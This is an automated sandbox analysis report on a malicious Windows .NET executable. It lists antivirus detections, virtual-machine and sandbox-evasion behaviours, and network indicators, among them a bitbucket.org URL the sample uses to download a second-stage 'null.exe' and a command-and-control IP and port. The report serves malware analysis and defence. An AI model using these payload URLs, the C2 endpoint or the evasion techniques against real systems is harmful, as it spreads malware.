Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fIPSLgT0lO.exe

Overview

General Information

Sample name:fIPSLgT0lO.exe
renamed because original name is a hash value
Original sample name:3c4c48003d8ddf5dc37e44fb340e81951ccb473dbb548e9752b83c69291a54f1.exe
Analysis ID:1573902
MD5:016d22f02af7424e8d99c6c243adcdb7
SHA1:1a4148700ab479b4c455a1eb9d5f48ac56799054
SHA256:3c4c48003d8ddf5dc37e44fb340e81951ccb473dbb548e9752b83c69291a54f1
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fIPSLgT0lO.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\fIPSLgT0lO.exe" MD5: 016D22F02AF7424E8D99C6C243ADCDB7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2930871276.0000000005B40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2929425687.0000000004532000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: fIPSLgT0lO.exe PID: 3020JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.fIPSLgT0lO.exe.45b7068.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.fIPSLgT0lO.exe.5b40000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: fIPSLgT0lO.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: fIPSLgT0lO.exeReversingLabs: Detection: 63%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: fIPSLgT0lO.exeJoe Sandbox ML: detected
              Source: fIPSLgT0lO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: fIPSLgT0lO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2931835613.0000000006460000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2931835613.0000000006460000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Ygdagggmo.pdb source: fIPSLgT0lO.exe, fIPSLgT0lO.exe, 00000000.00000002.2930414690.00000000059C0000.00000004.08000000.00040000.00000000.sdmp
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 181.131.217.244:30203
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
              Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: formationslistcomplet2.sexidude.com
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000367A000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49731 version: TLS 1.2

              System Summary

              barindex
              .NET source code contains very large array initializations
              Source: fIPSLgT0lO.exe, IterableProxy.csLarge array initialization: WaitForCentralProxy: array initializer size 544048
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_0197F9600_2_0197F960
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_0197408C0_2_0197408C
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_019717CF0_2_019717CF
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_019717E00_2_019717E0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_019746B00_2_019746B0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971DA80_2_01971DA8
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971DE20_2_01971DE2
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01976F910_2_01976F91
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01976FA00_2_01976FA0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971EBD0_2_01971EBD
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971E0C0_2_01971E0C
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971E2C0_2_01971E2C
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971E400_2_01971E40
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_01971E680_2_01971E68
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BA38080_2_05BA3808
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BA03C70_2_05BA03C7
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BA14700_2_05BA1470
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BA06FF0_2_05BA06FF
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC24D80_2_05BC24D8
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC74280_2_05BC7428
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC87620_2_05BC8762
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC56B00_2_05BC56B0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCD1910_2_05BCD191
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA8E00_2_05BCA8E0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC6B980_2_05BC6B98
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC0B580_2_05BC0B58
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC4A980_2_05BC4A98
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC24C80_2_05BC24C8
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA4300_2_05BCA430
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC74190_2_05BC7419
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC60680_2_05BC6068
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC60680_2_05BC6068
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC4DE00_2_05BC4DE0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC6E150_2_05BC6E15
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA98C0_2_05BCA98C
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA8E00_2_05BCA8E0
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA8D10_2_05BCA8D1
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC6B8B0_2_05BC6B8B
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCCB1A0_2_05BCCB1A
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BCA8E00_2_05BCA8E0
              Source: fIPSLgT0lO.exeBinary or memory string: OriginalFilename vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2927749638.00000000014BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2930414690.00000000059C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYgdagggmo.dll" vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exe, 00000000.00000002.2931835613.0000000006460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exeBinary or memory string: OriginalFilenameSzscawiqbxm.exe" vs fIPSLgT0lO.exe
              Source: fIPSLgT0lO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: fIPSLgT0lO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: fIPSLgT0lO.exe, IterableProxy.csCryptographic APIs: 'CreateDecryptor'
              Source: fIPSLgT0lO.exe, ContextCalculator.csCryptographic APIs: 'CreateDecryptor'
              Source: fIPSLgT0lO.exe, ContextCalculator.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, HhHCZOrqTDfQTVEOXtS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, wkWHNFrXh0CxnxlXjUk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, zfhNj9d50qVDplTlqh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, zfhNj9d50qVDplTlqh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: classification engineClassification label: mal84.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMutant created: NULL
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeFile created: C:\Users\user\AppData\Local\Temp\pqyvmk.exeJump to behavior
              Source: fIPSLgT0lO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: fIPSLgT0lO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fIPSLgT0lO.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
